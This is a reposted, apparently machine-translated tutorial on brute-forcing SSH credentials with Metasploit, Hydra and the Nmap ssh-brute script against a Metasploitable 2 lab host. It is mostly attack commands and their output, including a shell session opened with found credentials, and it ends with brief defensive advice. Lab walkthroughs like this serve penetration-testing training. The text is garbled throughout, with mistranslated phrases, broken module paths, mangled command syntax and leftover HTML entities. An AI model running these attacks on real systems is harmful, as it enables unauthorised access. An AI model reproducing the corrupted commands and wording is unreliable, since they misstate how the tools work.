قالب وردپرس درنا توس
Home / Tips and Tricks / How to Get SSH Access to Servers Through Brute-Forcing Credentials «Null Byte :: WonderHowTo

How to Get SSH Access to Servers Through Brute-Forcing Credentials «Null Byte :: WonderHowTo



SSH is one of the most common protocols used in modern IT infrastructures and can therefore be an important attack vector for hackers. One of the most reliable ways to get SSH access to servers is to brutally enforce credentials. There are some ways to perform an SSH brute-force attack, which ultimately leads to the identification of valid credentials.

Although this is not the only option, tools such as Metasploit, Hydra, and Nmap Scripting Engine are in Nmap to perform this task, all of which are included in Kali Linux. As for the goal, we will practice Metasploitable 2, a vulnerable test environment for pentesting and security research.

Overview of SSH

SSH (Secure Shell) is a network protocol that allows encrypted communication over an insecure network. This was developed as an alternative to Telnet, which sends information in plain text ̵

1; a problem especially with passwords.

The SSH cryptographic network protocol uses a client-server model, that is, the client initiates a connection to the server and communication is established after authentication. SSH can use both password authentication and private key authentication, the latter being considered more secure.

Recommended Reading Material: SSH, The Secure Shell: The Final Guide

The use of SSH includes the provisioning of remotes, logins, and command execution, file transfer, mobile development, and connectivity troubleshooting in cloud-based applications. Virtually every major corporation implements SSH in one way or another, making it a valuable technology.

Scan with Nmap

Before we begin brute-force attacks, we need to check the status of The Port, running on the SSH. We can do a simple Nmap scan to see if it's open or not. Instead of scanning all standard ports, you can specify a single port number with the flag -p .

  nmap 172.16.1.102 -p 22 
  Starting Nmap 7.70 (https: // nmap.). org) on ​​2019-02-26 14:58 CST
Nmap scan report for 172.16.1.102
Host is active (0.0039s latency).

PORT STATE SERVICE
22 / tcp open ssh
MAC Address: 08: 00: 27: 77: 62: 6C (Virtual Oracle VirtualBox NIC)

Nmap finished: 1 IP address (1 host up) scanned in 13.33 seconds 

It can be seen above that port 22 is open and the SSH service is running on it. It would be a waste of time if it was closed or did not run at all. Now we can start brute-forcing.

Method 1: Metasploit

The first method we will try today is one of Metasploit's auxiliary scanners. First, start the PostgreSQL database with the following command:

  service postgresql start 

Now you can start Metasploit by typing msfconsole in the terminal. You should see "msf", but for me it's "msf5" because I'm using the latest version, Metasploit 5, which can be updated by running the latest version of Kali. It's always a good idea to keep up to date with the latest exploits and tools. Here's the command I'm using to update:

  apt-get update && apt-get dist-upgrade 

After being greeted by the welcome banner for msfconsole we find the appropriate module with the Command search .

  search ssh 
  Matching modules
==================

Date of disclosure of the name rank verification of the description
---- --------------- ---- ----- -----------
auxile / dos / windows / ssh / sysax_sshd_kexchange 2013-03-17 normal No sysax Multi-Server 6.10 SSHD key exchange Denial of Service
Auxiliary / fuzzers / ssh / ssh_kexinit_corrupt normal No SSH key exchange initialization error
Auxiliary / fuzzers / ssh / ssh_version_15 normal No SSH 1.5 version Fuzzer
Auxiliary / fuzzers / ssh / ssh_version_2 normal No SSH 2.0 version Fuzzer
auxile / fuzzers / ssh / ssh_version_corrupt normal No SSH version corruption
Auxiliary / scanner / http / cisco_firepower_login normal Yes Cisco Firepower Management Console 6.0 Sign In
Auxiliary / scanner / http / gitlab_user_enum 2014-11-21 normal Yes GitLab User Enumeration
aux / scanner / ssh / apache_karaf_command_execution 2016-02-09 normal Yes Command execution of Apache Karaf Default Credentials
Auxiliary / scanner / ssh / cerberus_sftp_enumusers 2014-05-27 normal Yes Cerberus FTP server SFTP username enumeration
Auxiliary device / scanner / ssh / detect_kippo normal Yes Kippo SSH-Honeypot detector
Auxiliary device / scanner / ssh / eaton_xpert_backdoor 2018-07-18 normal Yes Eaton Xpert-Meter SSH scanner for the private key
Support / Scanner / ssh / fortinet_backdoor 2016-01-09 normal Yes Fortinet SSH backdoor scanner
Utility / Scanner / ssh / juniper_backdoor 2015-12-20 normal Yes Juniper SSH backdoor scanner
aux / scanner / ssh / karaf_login normal Yes Apache Karaf Login Utility
auxs / scanner / ssh / libssh_auth_bypass 2018-10-16 normal Yes libssh Authentication Bypass Scanner
Auxiliary / Scanner / ssh / ssh_enumusers normal Yes SSH Username Enumeration
Auxiliary / scanner / ssh / ssh_identify_pubkeys normal Yes SSH Public Key Acceptance Scanner
aux / scanner / ssh / ssh_login normal Yes SSH Login Check Scanner
aux / scanner / ssh / ssh_login_pubkey normal Yes SSH Public Key Login Scanner
Auxiliary / Scanner / ssh / ssh_version normal Yes SSH version scanner

... 

The module ssh_login is exactly what we need. Equip it with the command use . After that you should use "msf5 utility (scanner / ssh / ssh_login)" to let you know that you are working in the right place.

  Use utility / scanner / ssh / ssh_login 

. Then you can enter options . to display the available settings for the scanner.

  Options 
  Module options (Auxiliary / Scanner / ssh / ssh_login):

Name Current setting Required description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try empty passwords for all users
BRUTEFORCE_SPEED 5 yes How fast bruteforce from 0 to 5
DB_ALL_CREDS false no Try each user / password pair stored in the current database
DB_ALL_PASS false no Adds all passwords in the current database to the list
DB_ALL_USERS false no Adds all users in the current database to the list
PASSWORD no A specific password that you can use to authenticate
PASS_FILE no file with passwords, one per line
RHOSTS yes The destination address range or CIDR identifier
RPORT 22 yes The destination port
STOP_ON_SUCCESS false yes Stops guessing when a credential is working for a host
THREADS 1 yes The number of concurrent threads
USERNAME No A specific user name under which to authenticate
USERPASS_FILE no File containing users and passwords, separated by spaces, one pair per line
USER_AS_PASS false no Try the user name as the password for all users
USER_FILE no Username file, one per line
VERBOSE false yes Whether the output should be printed for all attempts 

We need to make some settings for it to work properly. RHOSTS is the IP address of our destination.

  Rhosts set 172.16.1.102 
  Rhosts => 172.16.1.102 

Next, STOP_ON_SUCCESS stops valid credentials.

  set stop_on_success true 
  stop_on_success => true 

Then USER_FILE is a list of usernames. txt

And PASS_FILE is a list of passwords.

  set pass_file passwords.txt 
  pass_file => passwords.txt 

Finally there is VERBOSE displays all attempts.

  set verbose true 
  verbose => true 

For the user and password files, I used a shortened list of known credentials for this demonstration. In a real attack, you probably want to use one of the known or custom word lists to meet your needs.

We should have prepared everything now. Enter run at the prompt to start it:

  run 
  [-] 172.16.1.102:22 - Error: & # 39; user: password & # 39;
[-] 172.16.1.102:22 - Error: & # 39; user: password123 & # 39;
[-] 172.16.1.102:22 - Failed: & # 39; user: msfadmin & # 39;
[-] 172.16.1.102:22 - Error: & # 39; user: Admin & # 39;
[-] 172.16.1.102:22 - Failed: & # 39; user: default & # 39;
[-] 172.16.1.102:22 - Failed: & # 39; user: root & # 39;
[-] 172.16.1.102:22 - Failed: & # 39; user: Toor & # 39;
[-] 172.16.1.102:22 - Failed: & # 39; user: Hello & # 39;
[-] 172.16.1.102:22 - Failed: & # 39; user: Welcome & # 39;
[-] 172.16.1.102:22 - Failed: & # 39; user: hunter2 & # 39;
[-] 172.16.1.102:22 - Failed: & # 39; msfadmin: password & # 39;
[-] 172.16.1.102:22 - Failed: & # 39; msfadmin: Password123 & # 39;
[+] 172.16.1.102:22 - Success: & # 39; msfadmin: msfadmin & # 39; U uid = 1000 (msfadmin) gid = 1000 (msfadmin) Groups = 4 (adm), 20 (dialout), 24 (cdrom), 25 (floppy), 29 (audio), 30 (dip), 44 ( Video), 46 (plug-dev), 107 (backup), 111 (ipadmin), 112 (admin), 119 (sambashare), 1000 (msfadmin) Linux Metasploitable 2.6.24 -16-server # 1 SMP Thu Apr 10 13: 58:00 UTC 2008 i686 GNU / Linux & # 39;
[*] The command shell session 1 opened at 2019-02-26 15:06:58 -0600 (172.16.1.100:37615 -> 172.16.1.102:22)
[*] Scanned 1 of 1 Hosts (100% complete)
[*] Completion of the auxiliary module 

Since we set the verbose option, we can see all the attempts as they take place. Depending on the number of combinations of username and password, the execution may take some time.

If valid credentials are found, a success message is displayed and a command shell pops up. However, we do not see it automatically, so we can view the current active sessions with the command .

  Sessions 
  Active Sessions
=================

ID Name Type Information Connection
- ---- ---- ----------- ----------
1 Shell Linux SSH msfadmin: msfadmin (172.16.1.102:22) 172.16.1.100:37615 -> 172.16.1.102:22 (172.16.1.102) 

This indicates that it is an SSH connection. To interact with this session, use the flag -i .

  sessions -i 1 
  [*] Start of interaction with 1 ...

I would
uid = 1000 (msfadmin) gid = 1000 (msfadmin) groups = 4 (adm), 20 (dialout), 24 (cdrom), 25 (floppy), 29 (audio), 30 (dip), 44 (video), 46 (plugdev), 107 (backup), 111 (lpadmin), 112 (admin), 119 (sambashare), 1000 (msfadmin) 

Now we are connected to the destination via SSH and can execute commands as normal.

Method 2: Hydra

The next tool we will use is Hydra, a powerful login cracker that is very fast and supports a number of different protocols. To view the help and some basic uses, just type hydra into the terminal. (Note, if you were previously in the MSF console, make sure you have removed cd before using Hydra.)

  Hydra 
  Hydra v8.8 (c) 2019 by van Hauser / THC - Please do not use in military or intelligence organizations or for illegal purposes.

Syntax: Hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

options:
-l LOGIN or -L FILE login with LOGIN name or load multiple logins from FILE
-p PASS or -P FILE try the password PASS or load multiple passwords from the FILE
-C FILE colon "login: pass" format instead of -L / -P options
-M FILE list of attacking servers, one entry per line, & # 39;: & # 39; to specify the port
-t TASKS executes TASKS number of connections per destination in parallel (default: 16)
-U-service module usage details
-h other command-line options (COMPLETE HELP)
Server's destination: DNS, IP or 192.168.0.0/24 (this OR the -M option)
Service for the Cracking Service (supported protocols can be found below)
OPT Some service modules support additional inputs (-U for module help)

Supported Services: adam6500 asterisk Cisco cisco enable cvs firebird ftp ftps http [s] - {head | get | post} http [s] - {get | post-form http-proxy http-proxy-urlenum icq imap [s] irc ldap2 [s] ldap3 [-{cram|digest}md5][s]   mssql mysql nntp Oracle Listener Oy-Sides PCanywhere pcnfs pop3 [s] postgres radmin2-rdp-redis rexec-rpin-rsc-rtsp-s7-300-sip-smtp-smtp- [smtp] teamspeak telnet [s] vmauthd vnc xmpp

Hydra is a tool to guess / crack valid login / password pairs. Licensed under AGPL
v3.0. The latest version is always available at https://github.com/vanhauser-thc/thc-hydra
Do not use in military or intelligence organizations or for illegal purposes.

Example: hydra -l user -P passlist.txt ftp://192.168.0.1 

Hydra contains a number of options. Today, however, we will use:

  • The -L flag, which specifies a list of login names.
  • The -P flag indicating a list of passwords.
  • ssh: //172.16.1.102 – our goal and protocol.
  • The -t flag is set to 4 which sets the number of parallel tasks.

Once we start it, the tool displays the status of the attack:

  hydra -L users.txt -P passwords.txt ssh: //172.16.1.102 -t 4 
  Hydra v8.8 (c ) 2019 by van Hauser / THC - Please do not use military or intelligence organizations or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starts on 02/02/29 15:12:47
[DATA] Maximum 4 tasks per server, a total of 4 tasks, 90 login attempts (l: 9 / p: 10), ~ 23 attempts per task
[DATA] Attack on ssh: //172.16.1.102: 22 / 

After some time, the number of successful logins found is completed and displayed.

  [22] [ssh] Host: 172.16.1.102 Login: msfadmin Password: msfadmin
[STATUS] 44.00 attempts / minute, 44 attempts in 00: 01h, 46 in 00: 02h, 4 active
[STATUS] 42.00 Attempts / Minute, 84 Attempts in 00: 02h, 6 in 00: 01h, 4 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) ended on 2019-02-26 15:15:10 

The parallel processing power of Hydra is a good choice when many potential detections are involved ,

Method 3: Nmap Scripting Engine

The last method of enforcing SSH credentials that we will try today involves using the Nmap Scripting Engine. NSE includes a script that attempts to force all possible combinations of username and password. To perform this attack, you can run a simple Nmap scan from a new terminal as before. However, some additional options are available:

  • – script ssh-brute specifies the script to use.
  • – Script arguments set the arguments for the script separated by a comma.
  • userdb = users.txt is the list of usernames we want to use [ssh-brute] passdb = passwords.txt is the list of passwords we want to use.

Now we can start the scan:

  nmap 172.16.1.102 -p 22 - ssh-brute script --script-args userdb = users.txt, passdb = passwords.txt 
  Starting Nmap 7.70 (https : //nmap.org) at 2019-02-26 15:17 CST 

NSE Display of brute force attempts and credentials. Be patient – depending on the number of usernames and passwords used, this can take some time.

  NSE: [ssh-brute] User name / password pair is being tried: User: User
NSE: [ssh-brute] Username / Password pair is being tried: msfadmin: msfadmin
NSE: [ssh-brute] Username / Password pair is being tried: admin: admin
NSE: [ssh-brute] User name / password pair is being tried: root: root
NSE: [ssh-brute] Username / Password pair is being tried: john: john
NSE: [ssh-brute] Username / Password pair is tried: Default: Default
NSE: [ssh-brute] Username / Password pair is being tried: Support: Support
NSE: [ssh-brute] Username / Password Pair Attempted: Service: Service
NSE: [ssh-brute] Username / Password pair is being tried: adam: adam
NSE: [ssh-brute] Username / Password pair is being tried: admin: password
NSE: [ssh-brute] User name / password pair is being tried: root: password
NSE: [ssh-brute] Username / Password pair is being tried: john: password
NSE: [ssh-brute] Username / Password pair is being tried: Default: Password
NSE: [ssh-brute] Username / Password pair is being tried: Support: Password
NSE: [ssh-brute] Username / Password pair is being tried: Adam: Password
NSE: [ssh-brute] Username / Password pair is being tried: admin: Password123
NSE: [ssh-brute] Username / Password pair is being tried: root: Password123
NSE: [ssh-brute] Username / Password pair is being tried: john: Password123
NSE: [ssh-brute] Username / Password pair is tried: Default: Password123

... 

After a while the scan is finished and a report is displayed in the terminal.

  Nmap scan report for 172.16.1.102
Host is active (0.0011s latency).

PORT STATE SERVICE
22 / tcp open ssh
| ssh brute:
| accounts:
| User: User - Valid credentials
| msfadmin: msfadmin - valid credentials
| service: service - valid credentials
| _ Statistics: 66 guesses performed in 124 seconds, average tps: 0.5
MAC Address: 08: 00: 27: 77: 62: 6C (Virtual Oracle VirtualBox NIC)

Nmap finished: 1 IP address (1 host up) scanned in 147.59 seconds 

Above we can see that three valid credentials were found. This script is useful because it goes through all possible pairs of usernames and passwords, which sometimes results in more results.

Preventing SSH Brute Forcing

The reality is when you have a server facing the internet. There will be a lot of SSH brute force attempts every day, many of which are automated . But do not worry, there are a few simple solutions to protect against and reduce the number of login attempts.

One of the simplest ways is to change the port number that SSH handles. Although this deters the most rudimentary brute-force attempts, it's easy to look for SSH running on alternate ports.

A better method is to implement a service such as Fail2ban, DenyHosts, or iptables to block brute-force attempts at the host level. Combined with the use of private key authentication instead of passwords, you will not be able to reach most attackers. If password-based authentication is required, use strong passwords and follow best practices.

Summary

In this guide, we learned about SSH and how to roast credentials to gain access to a target. First, we described how to identify open ports with SSH. Then we learned to perform a brute-force attack using three methods: Metasploit, Hydra, and Nmap Scripting Engine. Finally, we worked through some ways to protect against this type of attack.

SSH is a very common protocol, so it's important that every hacker knows how to attack – and how to prevent it.

Cover image of Skitterphoto / Pexels; Screenshots of drd_ / zero byte

Source link